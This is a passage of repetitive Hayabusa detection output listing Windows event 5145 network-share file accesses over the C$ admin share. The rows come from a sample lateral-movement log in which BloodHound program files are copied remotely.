23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system | IP Addr: 10.0.2.15 | LID: 